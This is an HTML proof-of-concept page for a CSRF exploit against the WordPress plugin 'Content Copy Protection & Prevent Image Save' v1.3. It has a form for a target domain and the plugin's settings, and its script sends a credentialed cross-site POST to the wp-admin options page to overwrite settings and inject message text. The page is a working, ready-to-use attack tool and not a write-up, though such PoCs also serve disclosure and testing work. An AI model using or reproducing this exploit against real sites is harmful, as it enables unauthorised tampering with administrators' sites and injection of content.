<!DOCTYPE html>
<!--
	 __ __ ___ ____ ____ 
	|  |  |   |__  |  __|
	| | | | / |  __|  __|
	|_|_|_|___|____|____|
-->
<html lang="en">
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<title>m0ze@blackcore:~# Content Copy Protection &amp; Prevent Image Save v1.3 CSRF PoC</title>
		<meta name="description" content="Content Copy Protection &amp; Prevent Image Save v1.3 CSRF PoC">
		<meta name="keywords" content="Content Copy Protection &amp; Prevent Image Save, CSRF, PoC, exploit">
		<meta name="author" content="m0ze">
		<script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
		<style type="text/css">
			<!--
			body {background: #000000; color: #e61d4c; padding: 20px; margin: 0; font-family: Verdana, sans-serif;}
			form {margin: 0; padding: 20px;}
			h1 {font-family: Verdana, sans-serif; font-size: 20px; line-height: 1em; border-bottom: 2px #e61d4c solid; padding-bottom: 8px;}
			::-moz-selection {color: #000000; background: #e61d4c;}
			::selection {color: #000000; background: #e61d4c;}
			*:focus {outline: none;}
			a, a:hover, a:visited, a:active {text-decoration: none; color: #e61d4c;}
			input {min-width: 280px; margin: 10px 20px 4px 0px; padding: 12px; background: #000000; border: 1px #e61d4c solid; color: #e61d4c; font-weight: bold; font-family: Verdana, sans-serif; opacity: 1; transition: 0.4s;}
			input[type="button"] {margin: 0px 20px 0px 0px; padding: 12px 54px; background: #000000; border: 1px #e61d4c solid; cursor: pointer; color: #e61d4c; font-weight: bold; font-family: Verdana, sans-serif; opacity: 1; transition: 0.4s; text-transform: uppercase;}
			input[type="button"]:hover {background: #e61d4c; border: 1px #e61d4c solid; color: #000000;}
			.checkboxblock {display: inline-block; vertical-align: middle; font-size: 14px; margin-right: 20px;}
			.custom-checkbox {position: absolute; z-index: -1; opacity: 0;}
			.custom-checkbox+label {display: inline-flex; align-items: center; user-select: none; text-transform: uppercase;}
			.custom-checkbox+label::before {content: ''; display: inline-block; width: 1em; height: 1em; flex-shrink: 0; flex-grow: 0; border: 1px solid #e61d4c; margin-right: 0.5em; background-repeat: no-repeat; background-position: center center; background-size: 50% 50%;}
			.custom-checkbox:checked+label::before {border-color: #e61d4c; background-color: #e61d4c; background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%23000000' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3e%3c/svg%3e");}
			.custom-checkbox:not(:disabled):not(:checked)+label:hover::before {border-color: #e61d4c;}
			.custom-checkbox:not(:disabled):active+label::before {background-color: #e61d4c; border-color: #e61d4c;}
			.custom-checkbox:focus:not(:checked)+label::before {border-color: #e61d4c;}
			.custom-checkbox:disabled+label::before {background-color: #e61d4c;}
			-->
		</style>
	</head>
	<body>
		<h1>### -- [ CSRF | Content Copy Protection &amp; Prevent Image Save v1.3 ]</h1>
		<h2>Info:</h2>
		<p>✖ Proof of concept is provided for informational purposes only.</p>
		<p>✖ Successful exploitation requires <b>administrator</b> privileges.</p>
		<p>✖ Injected payload will trigger an alert message with the text «Injected!».</p>
		<p>✖ Tested on WordPress v5.7 + Content Copy Protection &amp; Prevent Image Save <a href="https://wordpress.org/plugins/prevent-content-copy-image-save/" target="_blank">⭷</a> plugin v1.3 [2021-03-29]</p>
		<br>
		<h2>Settings:</h2>
		<h3>Target URL*:</h3>
		* Only <b>domain name</b> needed!<br>
		<input id="target" name="target" value="https://target.com">
		<br>	
		<br>
		<br>
		<h3>Text Options:</h3>
		<span style="display: inline-block; width: 480px;">Prevent Selection:</span>
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="textoption_select1" name="textoption_select1">
			<label for="textoption_select1">On / Off</label>
		</div>
		<br>
		<br>
		<span style="display: inline-block; width: 480px;">Prevent CTRL + A (Select All):</span>
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="textoption_select2" name="textoption_select2">
			<label for="textoption_select2">On / Off</label>
		</div>
		<br>
		<br>
		<span style="display: inline-block; width: 480px;">Prevent CTRL + C (Copy):</span>
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="textoption_select3" name="textoption_select3">
			<label for="textoption_select3">On / Off</label>
		</div>
		<br>
		<br>
		<span style="display: inline-block; width: 480px;">Prevent CTRL + X (Cut):</span>
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="textoption_select4" name="textoption_select4">
			<label for="textoption_select4">On / Off</label>
		</div>
		<br>
		<br>
		<span style="display: inline-block; width: 480px;">Prevent CTRL + V (Paste):</span>
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="textoption_select5" name="textoption_select5">
			<label for="textoption_select5">On / Off</label>
		</div>
		<br>
		<br>
		<span style="display: inline-block; width: 480px;">Allow Copy, Cut and Paste for Text Input and Text Area:</span>
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="textoption_select6" name="textoption_select6">
			<label for="textoption_select6">On / Off</label>
		</div>
		<br>
		<br>
		<br>
		<h3>Image Options:</h3>
		<span style="display: inline-block; width: 480px;">Prevent Image Saving:</span>
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="imageoptions_saveimg" name="imageoptions_saveimg">
			<label for="imageoptions_saveimg">On / Off</label>
		</div>
		<br>
		<br>
		Image Saving Disabled Message Text:<br>
		<input id="image_save_msg" type="text" name="image_save_msg" value="Injected! PoC by m0ze">
		<br>
		<br>
		<br>
		<h3>Other Options:</h3>
		<span style="display: inline-block; width: 480px;">Prevent Saving Page Using CTRL + S:</span>
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="otheroptions_preventsaving" name="otheroptions_preventsaving">
			<label for="otheroptions_preventsaving">On / Off</label>
		</div>
		<br>
		<br>
		<span style="display: inline-block; width: 480px;">Disable Context Menu:</span>
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="otheroptions_disablecontext" name="otheroptions_disablecontext">
			<label for="otheroptions_disablecontext">On / Off</label>
		</div>
		<br>
		<br>
		Context menu Disabled Message Text:<br>
		<input id="no_menu_msg" type="text" name="no_menu_msg" value="Injected! PoC by m0ze">
		<input id="updateoptions" type="button" value="Inject">
		<br>
		<br>
		<br>
		<script>
			$("#updateoptions").click(function(e){
				var url = $("#target").val().replace(/\/$/, "") + "/wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php";
				var imagesavemsg = $("#image_save_msg").val();
				var nomenumsg = $("#no_menu_msg").val();
				var txtopts1 = "0";
				if ( document.getElementById( "textoption_select1" ).checked ) {txtopts1 = "1";} else {txtopts1 = "0";}
				var txtopts2 = "0";
				if ( document.getElementById( "textoption_select2" ).checked ) {txtopts2 = "1";} else {txtopts2 = "0";}
				var txtopts3 = "0";
				if ( document.getElementById( "textoption_select3" ).checked ) {txtopts3 = "1";} else {txtopts3 = "0";}
				var txtopts4 = "0";
				if ( document.getElementById( "textoption_select4" ).checked ) {txtopts4 = "1";} else {txtopts4 = "0";}
				var txtopts5 = "0";
				if ( document.getElementById( "textoption_select5" ).checked ) {txtopts5 = "1";} else {txtopts5 = "0";}
				var txtopts6 = "0";
				if ( document.getElementById( "textoption_select6" ).checked ) {txtopts6 = "1";} else {txtopts6 = "0";}
				var imgoptsaveimg = "0";
				if ( document.getElementById( "imageoptions_saveimg" ).checked ) {imgoptsaveimg = "1";} else {imgoptsaveimg = "0";}
				var otheroptprevent = "0";
				if ( document.getElementById( "otheroptions_preventsaving" ).checked ) {otheroptprevent = "1";} else {otheroptprevent = "0";}
				var otheroptdisable = "0";
				if ( document.getElementById( "otheroptions_disablecontext" ).checked ) {otheroptdisable = "1";} else {otheroptdisable = "0";}
				xhr = new XMLHttpRequest();
				xhr.open("POST", url, true);
				xhr.withCredentials = "true";
				xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
				var body = "select="+txtopts1+"&CTRLA="+txtopts2+"&CTRLC="+txtopts3+"&CTRLX="+txtopts4+"&CTRLV="+txtopts5+"&CTRLINPUT="+txtopts6+"&saveimg="+imgoptsaveimg+"&image_save_msg="+imagesavemsg+"&CTRLS="+otheroptprevent+"&cmenu="+otheroptdisable+"&no_menu_msg="+nomenumsg+"&Save_Options=++Update+Options++";
				xhr.send(body);
				xhr.onreadystatechange = function() {if(xhr.readyState == 4 && xhr.status == 200) {alert("Injected!");}}
			});
		</script>
		<script>
			console.log(`%c
 ╔═══════════════════════════════════════════════════════════════════════════╗ 
 ║                                                                           ║ 
 ║    ███╗   ███╗ ██████╗ ███████╗███████╗    > System update available      ║ 
 ║    ████╗ ████║██╔═████╗╚══███╔╝██╔════╝    > Update: Y/N                  ║ 
 ║    ██╔████╔██║██║██╔██║  ███╔╝ █████╗      > Updating, please wait...     ║ 
 ║    ██║╚██╔╝██║████╔╝██║ ███╔╝  ██╔══╝      > System update successful!    ║ 
 ║    ██║ ╚═╝ ██║╚██████╔╝███████╗███████╗                                   ║ 
 ║    ╚═╝     ╚═╝ ╚═════╝ ╚══════╝╚══════╝    > No problem, right?           ║ 
 ║                                                                           ║ 
 ╚═══════════════════════════════════════════════════════════════════════════╝ `,"color:#e61d4c; background:#000000; font-family: monospace");
		</script>
	</body>
</html>